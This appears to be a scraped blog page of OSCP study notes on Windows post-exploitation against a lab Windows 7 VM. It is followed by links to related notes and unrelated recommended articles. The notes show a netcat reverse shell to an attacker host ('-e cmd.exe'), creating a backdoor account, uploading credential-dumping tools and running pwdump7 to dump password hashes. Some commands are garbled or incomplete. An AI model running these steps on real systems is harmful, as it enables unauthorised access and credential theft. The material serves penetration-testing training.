Windows Post Exploitation

Target Server: IE8-Win 7 VM

1. Download and upload the fgdump, PwDump7, wce and netcat into the IEUser folder on Windows 7.

2.Create the new user hackme with the password "password".

3.Locate fgdump and wce on Kali Linux. We can upload them to Win7 through FTP, wget, HTTP etc.

4.Estalish nc connection between Kali Linux and Windows 7.

Kali Linux

nc -nvlp

Windows 7

-nv 10.0.0.109  -e cmd.exe

We are connected now.

5.Execute the pwdump7 throuth Kali Linux.Then copy and save the result as windows file on the Desktop.

pwdump7

Show the routing table and try to find something interesting.

route print

Show the physical address and try to find something interesting.

arp -a

Show the active connections and try to find something interesting.

netstat -ano

Try to find more inreteting things as more as possible....

Post Exploitation Guide:

https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List

OSCP Learning Notes - Post Exploitation(2)的更多相关文章

  1. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  2. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  3. OSCP Learning Notes - Post Exploitation(3)

    Post-Exploit Password Attacks 1. Crack using the tool - john (Too slow in real world) Locate the roc ...

  4. OSCP Learning Notes - WebApp Exploitation(5)

    Remote File Inclusion[RFI] Prepare: Download the DVWA from the following website and deploy it on yo ...

  5. OSCP Learning Notes - WebApp Exploitation(4)

    Local File Inclusion[LFI] Target Pentester Lab: Download from the following website: https://www.vul ...

  6. OSCP Learning Notes - WebApp Exploitation(3)

    SQL Injection[SQLi] Refrence: SQL Injection Authentication Bypass Cheat Sheet https://pentestlab.blo ...

  7. OSCP Learning Notes - WebApp Exploitation(2)

    Cross-Site Scripting(XSS) 1. Using the tool - netdiscover to find the IP of target server. netdiscov ...

  8. OSCP Learning Notes - WebApp Exploitation(1)

    Installing XSS&MySQL FILE Download the Pentester Lab: XSS and MySQL FILE from the following webs ...

  9. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

随机推荐

  1. 【Spring】Bean的LifeCycle(生命周期)

    菜瓜:水稻,上次说Bean的LifeCycle,还没讲完 水稻:啥?说人话? 菜瓜:spring,bean,生命周期 水稻:哦哦,下次直接说人话.说正事,先从BeanFactory.Applicati ...

  2. Linux MySQL分库分表之Mycat

    介绍 背景 当表的个数达到了几百千万张表时,众多的业务模块都访问这个数据库,压力会比较大,考虑对其进行分库 当表的数据达到几千万级别,在做很多操作都比较吃力,考虑对其进行分库或分表 数据切分(shar ...

  3. C#数据结构与算法系列(九):栈实现综合计算器(中缀表达式)

    1.问题介绍 2.实现思路 3.代码实现 第一个版本(采用这个) public class ArrayStack { private int _maxSize; private int[] _arr; ...

  4. Elasticsearch系列---生产集群的索引管理

    概要 索引是我们使用Elasticsearch里最频繁的部分日常的操作都与索引有关,本篇从运维人员的视角,来玩一玩Elasticsearch的索引操作. 基本操作 在运维童鞋的视角里,索引的日常操作除 ...

  5. 斐讯N1搭建高性能博客

    前些日子我在网上淘到了一台斐讯n1,Amlogic S905D的板子让这个盒子平滑地用上了Armbian系统,有了linux的加持,让这个设备的玩法又上升了一个层次,网上大多都是把他作为旁路由用来富强 ...

  6. ECSHOP 2.5.1 二次开发文档【文件结构说明和数据库表分析】

    ecshop文件架构说明 /* ECShop 2.5.1 的结构图及各文件相应功能介绍 ECShop2.5.1_Beta upload 的目录 ┣ activity.php 活动列表 ┣ affich ...

  7. 【WPF】DataGrid多表头的样式设计

    需求 在使用WPF开发时,使用DataGrid列表显示数据时,有些字段可以进行分组显示,用于更好的表达它们之间存在的某种关系,因此就考虑到要对DataGrid的表头进行扩展,可以显示多行表头,让这些有 ...

  8. 进度条的使用 Progress控件

    MFC编程实例二:进度条的使用 2011-03-22 09:09:09|  分类: C++(C语言) |  标签:进度  nlower  nupper  添加  mfc  |字号 订阅    本人用的 ...

  9. JsPlumb在react的使用方法及介绍

    JsPlumb在react的使用方法及介绍 一.相关资料来源: 1.https://bitqiang.gitbooks.io/jsplumb/content/Chapter1_IMPORTS_AND_ ...

  10. 「区间DP」「洛谷PP3146 」[USACO16OPEN]248 G

    [USACO16OPEN]248 G 题目: 题目描述 Bessie likes downloading games to play on her cell phone, even though sh ...